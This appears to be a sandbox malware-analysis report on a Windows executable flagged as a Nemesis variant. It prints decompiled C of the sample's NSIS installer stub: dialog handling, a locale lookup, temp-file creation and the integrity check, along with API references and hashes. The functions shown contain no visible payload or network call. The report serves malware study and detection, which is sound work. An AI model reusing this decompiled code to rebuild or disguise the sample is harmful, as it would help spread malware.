							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238); // executed
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8); // executed
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}

0x004040d0
0x004040d7
0x0040423e
0x00404242
0x00404246
0x00404248
0x0040424d
0x00404258
0x00404263
0x00404268
0x0040426a
0x0040426c
0x0040426f
0x00404274
0x00404282
0x0040428f
0x00404296
0x00404296
0x00404297
0x00404297
0x0040429c
0x004042a2
0x004042a9
0x004042af
0x004042b1
0x004042f1
0x004042f6
0x004042fb
0x004042fb
0x00404300
0x00404309
0x0040430b
0x00404310
0x00404316
0x0040431a
0x0040431a
0x0040431f
0x00404325
0x00000000
0x00000000
0x00404330
0x00404336
0x00000000
0x00000000
0x0040433f
0x00404347
0x0040434c
0x0040434f
0x00404355
0x0040435a
0x0040435d
0x00404363
0x00404368
0x0040436b
0x00404371
0x00404379
0x0040437f
0x00404385
0x00404389
0x00404390
0x00404390
0x00404390
0x0040439a
0x004043ac
0x004043b8
0x004043bd
0x004043c7
0x004043cd
0x004043cf
0x004043d4
0x004043d1
0x004043d1
0x004043d1
0x004043e4
0x004043fc
0x004043fe
0x00404404
0x00404419
0x00404406
0x0040440f
0x00404411
0x00404411
0x0040441f
0x00404430
0x00404446
0x0040444d
0x00404457
0x0040445c
0x0040445e
0x00000000
0x00404464
0x00404464
0x00404466
0x00000000
0x00000000
0x0040446c
0x00404470
0x00404495
0x0040449b
0x004044a1
0x004044a3
0x00000000
0x00000000
0x004044c9
0x004044cf
0x004044d1
0x004044d6
0x00000000
0x00000000
0x004044dc
0x004044df
0x004044e2
0x004044f9
0x00404505
0x0040451e
0x00404528
0x0040452d
0x00404533
0x00000000
0x00000000
0x0040453d
0x00404548
0x00000000
0x00404548
0x00404472
0x00404478
0x00000000
0x00000000
0x0040447e
0x00404484
0x00000000
0x00000000
0x00000000
0x0040448a
0x0040445e
0x00404555
0x00404561
0x00404568
0x00000000
0x004042b3
0x004042b3
0x004042b6
0x004042e9
0x004042e9
0x004042eb
0x00000000
0x00000000
0x00000000
0x004042eb
0x004042bc
0x004042c1
0x004042c3
0x00000000
0x00000000
0x004042d3
0x004042db
0x00000000
0x004042e1
0x004040e9
0x004040e9
0x004040ed
0x004040f2
0x00404101
0x00404101
0x00404107
0x0040410e
0x00404152
0x00404158
0x00404171
0x00404174
0x00404187
0x0040418d
0x00000000
0x00000000
0x00404193
0x0040419e
0x004041a0
0x004041a2
0x004041c1
0x004041c1
0x004041c4
0x004041c9
0x004041cc
0x004041dc
0x004041dd
0x004041df
0x00404215
0x00404225
0x00000000
0x00404225
0x004041e1
0x004041e7
0x00404200
0x00404205
0x00404207
0x00000000
0x00000000
0x00404209
0x004041f5
0x004041f5
0x004041f7
0x004041f7
0x00000000
0x004041f7
0x004041ea
0x004041ef
0x00000000
0x004041ef
0x004041ce
0x004041d4
0x00000000
0x00000000
0x004041d6
0x00000000
0x004041d6
0x004041c6
0x00000000
0x004041c6
0x004041ac
0x004041b3
0x004041b9
0x004041bb
0x00404591
0x00000000
0x00404591
0x00000000
0x004041bb
0x00404179
0x00000000
0x00404181
0x00404160
0x00404166
0x0040456e
0x00404574
0x00404581
0x00404587
0x00404587
0x00000000
0x00404110
0x00404115
0x00404121
0x0040412a
0x0040422b
0x00000000
0x00404149
0x0040414c
0x00000000
0x0040414c
0x0040412a
0x0040410e

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
ShowWindow.USER32(?), ref: 00404121
GetWindowLongW.USER32(?,000000F0), ref: 00404133
ShowWindow.USER32(?,00000004), ref: 0040414C
DestroyWindow.USER32 ref: 00404160
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
GetDlgItem.USER32(?,?), ref: 00404198
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
IsWindowEnabled.USER32(00000000), ref: 004041B3
GetDlgItem.USER32(?,00000001), ref: 0040425E
GetDlgItem.USER32(?,00000002), ref: 00404268
SetClassLongW.USER32(?,000000F2,?), ref: 00404282
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
GetDlgItem.USER32(?,00000003), ref: 00404379
ShowWindow.USER32(00000000,?), ref: 0040439A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
EnableWindow.USER32(?,?), ref: 004043C7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
EnableMenuItem.USER32(00000000), ref: 004043E4
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
SetWindowTextW.USER32(?,00423748), ref: 0040444D
ShowWindow.USER32(?,0000000A), ref: 00404581

Strings

H7B, xrefs: 00404429

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 121052019-2300413410
Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403da7
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,762E3420), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32(00429200), ref: 00403EBC
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
RegisterClassW.USER32(00429200), ref: 00403F81
DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0

Strings

Call, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
C:\Users\user\AppData\Local\Temp, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
1033, xrefs: 00403D37, 00403D93
.DEFAULT\Control Panel\International, xrefs: 00403D83
_Nb, xrefs: 00403E9B, 00403F03
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D1C
RichEdit20W, xrefs: 00403F63, 00403F69
H7B, xrefs: 00403D43
RichEd20, xrefs: 00403F45
.exe, xrefs: 00403E25
RichEdit, xrefs: 00403F72
RichEd32, xrefs: 00403F53
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1664645273
Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					__eflags =  *0x42a274 - _t94;
					if( *0x42a274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
									__eflags =  *0x42a27c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x24d7b
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x42a280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a274;
						if( *0x42a274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x0
						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x1425
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x0040314f
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x0040324a
0x00403251
0x00000000
0x00000000
0x00403257
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032ca
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x0040331d
0x00403320
0x00403329
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x0040334d
0x00403350
0x00403357
0x00403363
0x00403368
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x0040326d
0x00403272
0x00403274
0x00000000
0x00000000
0x0040327d
0x00403280
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x00403178
0x0040317a
0x0040317c
0x0040317c
0x00403180
0x00403185
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x0040318d
0x00403194
0x00403210
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031a5
0x004031aa
0x00000000
0x00000000
0x004031ac
0x004031b3
0x00000000
0x00000000
0x004031b5
0x004031bc
0x00000000
0x00000000
0x004031be
0x004031c5
0x00000000
0x00000000
0x004031c7
0x004031ce
0x00000000
0x00000000
0x004031d0
0x004031d6
0x004031df
0x004031e5
0x004031e8
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031f6
0x004031fa
0x00403202
0x00403202
0x00403205
0x00403208
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x0040320a
0x004031fc
0x00403200
0x00000000
0x00000000
0x00000000
0x0040321e
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403239
0x00403241
0x00403241
